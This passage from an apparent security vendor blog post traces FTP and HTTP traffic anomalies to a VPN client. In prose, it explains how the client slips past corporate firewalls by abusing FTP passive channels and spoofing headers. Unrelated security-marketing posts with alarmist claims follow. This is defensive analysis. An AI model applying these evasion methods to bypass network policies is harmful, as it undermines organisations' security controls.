From the perspective of C&C activity, the attempt to store and retrieve the same file via the STOR and RETR commands suddenly opens a potentially reasonable explanation. Passive mode FTP transfers dynamically open data channels on separate network flows, where the server port is dynamically decided by the server. If a stateful firewall is present in the network, it will need to support this by reacting to the control channel interactions and open the associated ports accordingly to allow the transfer. A store and retrieve on the same passive channel can then become an attempt to fool a stateful firewall into allowing bidirectional communication on the port opened by the passive mode.

HTTP Traffic

The FTP traffic was not the only anomaly. Throughout the Breach Defender user interface in Figure 1 we could pivot to the web requests established during the same time-frame by the same host (see Figure 4, click to enlarge). We further correlated the extracted web requests with those available in our backend, giving us a total of 293 connection attempts (towards 293 distinct IPs), of which only 15 were successful.

Web requests were sent by the same host that executed the port scan and established the weird FTP control connections.

Figure 4: Web requests were sent by the same host that executed the port scan and established the weird FTP control connections.

As shown in Figure 4, the requests were limited to three different hostnames: 8v9m[.]com, www.bing[.]com, and www.intercom[.]com. All web requests were POST, and besides those directed to 8v9m[.]com (which were using a constant and specific path and user agent), each connection was accessing a different resource, each time spoofing the user agent. Not a single DNS resolution was performed for the last two domains. Indeed, despite the HTTP headers indicating connections towards these hosts, the endpoints involved in the interaction were not associated in any way to the hosted infrastructure of these domains.

  • 8v9m.com
    • Path: /ClientApi
    • User-Agent: Go-http-client/1.1
    • Response code: 200
  • www.bing.com
    • Path: 6-char strings (e.g., /r7y9sp, /uhmq3a, /tm5qwn)
    • User-Agent:
      • Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)
      • Mozilla/5.0 (Linux; Android 7.0; SM-G9550 Build/NRD90M)
    • Response code: mostly 4xx
  • www.intercom.com
    • Path: 6-char strings (e.g., /ye4zkv, /8yakfu, /qzgp6c)
    • User-Agent:
      • Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X)
      • Mozilla/5.0 (Linux; Android 7.0; SM-G9550 Build/NRD90M)
      • Response code: mostly 4xx

Solving the Mystery

Summarizing the evidence collected so far, we seem to be dealing with something emulating FTP passive transfers and uploading and downloading data across the generated FTP channels, and generating very suspicious HTTP POST requests. This behavior seems clearly deceptive, and the use of these mechanisms for C&C data exfiltration seems a logical conclusion. But how to move the investigation forward?

We proceeded with the investigation by gauging the extent of this behavior and started searching for other endpoints connecting to the same hosts (see Figure 5, click to enlarge). It turned out that our original local host was not an isolated case: many other local hosts were exhibiting the very same traffic dynamics, collectively contacting several thousand external IPs, often belonging to the same CIDR blocks.

Graph of web requests towards intercom[.]com and 8v9m[.]com showing how many different hosts were generating the very same requests (and that sometimes more than one host was accessing the same randomly generated path).

Figure 5: Graph of web requests towards intercom[.]com and 8v9m[.]com showing how many different hosts were generating the very same requests (and that sometimes more than one host was accessing the same randomly generated path).

This is when we started considering whether the actual culprit was instead a legitimate application; we searched for the domain names extracted when sifting through all the web requests and, as detailed in a public forum here, we were indeed on the right path. The network footprint matches the behavior of a known VPN client (X-VPN) famous for punching holes through corporate firewalls to evade restrictive local network policies.

The first thing such a client does is connect to a set of IPs on ports assigned to common protocols. This is done to find online and reachable servers (which eventually triggered our port scan alert). The reason why the client abuses the FTP protocol by establishing connections resembling C&C channels is twofold: first, even corporate firewalls often allow connections to the FTP control port 21 (most likely for legacy reasons); and second, unlike normal file transfers, the resulting data channels can be established in either direction, allowing bidirectional dialogue-like interactions.

If FTP connections are filtered or dropped, then the client tries several other protocols, including HTTP, fully explaining the web requests directed to the very same hosts. To further evade advanced policy filtering (for example denying specific operating systems and devices) the client goes even further and spoofs the “Host” and “User-Agent” header fields, a fact we saw in Figure 2.

Conclusions

We were definitely amazed by the rather creative way with which modern VPN clients attempt to punch holes through corporate firewalls and attempt to establish a connection regardless of corporate policy. The high volume of data points generated by these connection attempts clearly shows why tracing network events and producing insights from a corporate network can be quite a challenge for a trained network engineer even when the network is bereft of malicious activity.

On the other hand, with the right tools in hand, we have also demonstrated that it is indeed possible to easily pivot across multiple information domains, and use that information to differentiate security incidents from mere network anomalies. As we showed in this blog post, having an increased visibility over network events can often reveal organizational policy violations like the presence of unexpected or unwanted tools, a common effect of BYOD policies which are only partially enforced.

The post A Wild Port Scan Appears. What now? appeared first on Lastline.

Computer Security Tips: Stay Safe Online

In recent times cyber security has raised the level of awareness and public consciousness as never before. Both large corporations and big organizations try to take care of online security as much as they can. That’s why cyber criminals and hackers have focused more on smaller companies and single entrepreneurs. This awful tendency leads to […]

Your Network Security Is As Important As Locking Your Front Door


Security throughout a company’s network, websites and business dealings has become even more critical than even just a few years ago; with different hackers and criminals trying to break through one’s network security at any given time, both your employees and your customers expect that their secure information is to be the highest priority.  If an attack or loss of data occurs, it can seriously damage a company’s reputation in the public’s eye, as well as cause employees to question whether their private information is really safe at their job.
                Computer network security is an investment that all businesses should make, especially in light of the fact that cybercrime has continued to grow exponentially as a threat to all businesses; this is not even limited to just your business located in the United States, but also worldwide.  This type of criminal activity is unlike anything the world has seen before, and many businesses are now recognizing the reality of needing a secure defense against such threats.  Smaller businesses can fall prey to these attempts as well, which is why it is critical to invest in a security assessment of one’s current procedures, methods and defenses.
                Having a professional organization evaluate your resources for any security leaks or issues can be beneficial for both your short and long-term interests.  A threat analysis is a great way to test your current defenses to discover what kind of data a hacker can currently breach, if any.  A penetration test also allows one to assess how a hacker can find ways into your current organization; with a focus not just on a success or failure rating, this test explores all potential outcomes and avenues that a criminal might take.  Altogether, investing in this type of technology is a great idea for your business, whether you are a start-up company or a business with twenty years of experience.   

With New Cyber Terror Threats, Investing In Cyber Security Is More Important Than Ever


In our times, network security is the most critical aspect and function of any business; almost all business are connected to online data in some way.  Even smaller companies such as small music store chains have specific email passwords and critical data that can be easily hacked by criminals.  To avoid these types of issues and to eliminate the chances of such security breaches, computer network security should be your number one priority.  There are criminals out there unlike what the world has previously witnessed; these are not people who wait to break in to your business at night.  The modern criminal is rapidly becoming a cyber threat; unseen, unheard and many times unstoppable to those who do not have proper cyber security.
                The threat is growing across the world as well; enemies of America and other countries throughout the world are rapidly planning more cyber-attacks than ever before.  Federal institutions have had their websites targeted and taken over by terror organizations, and the threat continues to grow.  It is only a matter of time before terrorist cells will see the harm they can cause by targeting the websites of average, everyday business, and conduct terror opportunities through the internet and cyberspace.  Network security should be more important than ever to every business owner; why take the risk of losing the trust of your customers and employees?  Protect your business from the unseen threats in the world, just as you would protect it from physical threats.